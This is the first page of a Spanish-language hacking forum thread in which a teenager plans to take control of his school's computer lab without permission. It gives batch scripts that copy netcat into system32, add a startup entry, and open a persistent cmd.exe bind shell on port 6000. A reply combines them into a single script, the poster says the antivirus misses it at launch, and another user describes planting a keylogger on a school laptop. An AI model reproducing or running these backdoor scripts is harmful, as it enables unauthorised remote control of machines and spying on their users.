elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Diario de un alumno en clase de informatica
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Diario de un alumno en clase de informatica  (Leído 20,103 veces)
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Diario de un alumno en clase de informatica
« en: 3 Noviembre 2009, 04:45 am »

Diario de un alumno en clase de informatica

Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.

Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).

NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).


Bueno empiezo con el mío:

14 computadoras (corriendo windows), en red (cable :P), una maquina server (windows server 2000)

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.

1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida

ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse

pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).

ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.

lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta

2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.
Código
  1. @echo off
  2. copy "D:\Misdoc\fede\intrusion escuela\base.bat" "%userprofile%\Men£ Inicio\Programas\Inicio\"

simplemente eso.

3º archivo:ejecucion de un archivo (netcat a la escucha)

Código
  1. @echo off
  2. start nc.exe -L -d -e cmd.exe -p 6000

simplemente eso.

Diagrama:


Como pueden ver es muy sencillo, programitas programados en batch.

si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.

asique decidi hacerlo por partes.

bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje :D y lo pruebo.

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.


PD: tengo 14 años dentro de todo esta bien jajaja
saludos
« Última modificación: 3 Noviembre 2009, 18:22 pm por fede_cp » En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Mindil

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Diario de un alumno en clase de informatica
« Respuesta #1 en: 3 Noviembre 2009, 12:01 pm »

yo tampoco soy un experto pero si corregidme si me equivoco XD. Para tenerlo todo en un archivo lo puesto asi...

  @echo off
copy "c:\nc.exe" "c:\WINDOWS\system32\"
cd "c:\WINDOWS\system32\"
copy "c:\WINDOWS\system32\nc.exe" "%userprofile%\Men£ Inicio\Programas\Inicio\"
cd\
start nc.exe -L -d -e cmd.exe -p 6000
exit


En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Diario de un alumno en clase de informatica
« Respuesta #2 en: 3 Noviembre 2009, 16:24 pm »

Tu code no estaría mal si el nc.exe ya estaria en algun directorio, pero el problema es que el netcat en mi caso no lo estaba, entonces use el quick batch compiler, lo inclui (es una opcion que tiene el qbfc), y entonces use

@echo off
copy %MYFILES%\nc.exe %systemroot%\system32

no es necesario poner change directory, porque al estar en system32, se ejecuta desde alli y no es necesario

despues el otro copy si esta bien

start nc.exe -L -d -e cmd.exe -p 6000

esto tambien esta bien, pero acordate que no es necesario poner cd porque por eso se lo paso a system32, para no tener que cambiar de directorio

saludos!

PD:comenten si les gusto la idea, seria un buen intercambio de difierentes tipso de intrusiones, en diferentes escenarios con diferentes restricciones y posibilidades.
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
VirajeCR

Desconectado Desconectado

Mensajes: 59



Ver Perfil
Re: Diario de un alumno en clase de informatica
« Respuesta #3 en: 3 Noviembre 2009, 18:44 pm »

1º archivo:coloca el netcat en system32 y se ejecuta

Como que la seguridad no existe por acá. :o
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Diario de un alumno en clase de informatica
« Respuesta #4 en: 4 Noviembre 2009, 01:04 am »

1º archivo:coloca el netcat en system32 y se ejecuta

Como que la seguridad no existe por acá. :o

El netcat no es reconocido por el nod 32 (no salta, en el escanneo si lo hace)

saludos!
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Diario de un alumno en clase de informatica
« Respuesta #5 en: 4 Noviembre 2009, 01:14 am »

A lo que se refiere es que para poder meter en nc en esa carpeta necesitas permisos de Admin, y que esten habilitados en un salon es malo ... ahora, con respecto a tu método, aún no lo entiendo, quién ejecuta que cosa y de que manera? XD, tu metes esos archivos en una carpeta compartida?

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Diario de un alumno en clase de informatica
« Respuesta #6 en: 4 Noviembre 2009, 01:20 am »

Yo estoy jodido en mi escuela, ya que tienen el deep freeze última versión que sólo jodé el fdf boteable... Además sería mucho daño sólo para jugar :) lo que sí me gustaría hacer es joder el PC con Windows server que tiene instalado oracle para así ver como lo instalan de nuevo y aprender bien de forma práctica xD pero en mi vida he usado Windows server por lo tanto ni hablar de programar algo para joderlo
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Diario de un alumno en clase de informatica
« Respuesta #7 en: 4 Noviembre 2009, 01:53 am »

aca estoy, jaja, em es asi la cosa, osea yo tengo una carpeta, que NO es necesario ser admin para manejarlas y modificarlas, osea no hay casi nada de seguridad.

entonces por ejemplo yo si quiero puedo modificarle el nombre de la carpeta, puedo manejar los archivos, modificarlos, casi todo se puede hacer  ;-) :laugh:

entonces tengo que tener acceso fisico a cada una de las pc, y lo tengo, entonces me dirijo a la carpeta compartida que anteriormente había colocado los archivos, voy rapidamente sin que nadie se entere y ejecuto los dos archivos en su respectivo orden.

si funciona lo voy a comentar.

saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Diario de un alumno en clase de informatica
« Respuesta #8 en: 4 Noviembre 2009, 02:08 am »

no se olviden, que es mejorable mucho mas, y por favor diganlo jajja, esa es la ideaa

y si tienen algun metodo posteenlo

saludoos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
1112815

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Diario de un alumno en clase de informatica
« Respuesta #9 en: 7 Noviembre 2009, 20:04 pm »

El otro día puse en keylogger muy simple en el portatil de mi cole. El caso es que tenía autologin como administrador (windows xp), así que puse en la carpeta inicio un keylogger ejecutable muy simple que lo que hace es guardar los logs en system32.

Nah, es por lammear un poco, si de verdad estuviera interesado haría que me mandara los logs por ftp o algo, pero me da pereza... que vago soy... xD
En línea

Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
generar codigo de un alumno
.NET (C#, VB.NET, ASP)
Choclito 3 6,275 Último mensaje 16 Diciembre 2010, 18:46 pm
por .mokk.
Alumno busca Maestro. « 1 2 »
Dudas Generales
Tracxus 10 5,728 Último mensaje 5 Julio 2011, 01:03 am
por Tracxus
Una ayuda a un nuevo alumno
Programación General
Cou1 1 1,899 Último mensaje 14 Abril 2015, 18:07 pm
por engel lex
Detenido un alumno de un centro escolar de Palma por hacerse con contraseñas del profesorado
Foro Libre
Mr.Byte 0 1,469 Último mensaje 24 Septiembre 2023, 09:14 am
por Mr.Byte
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines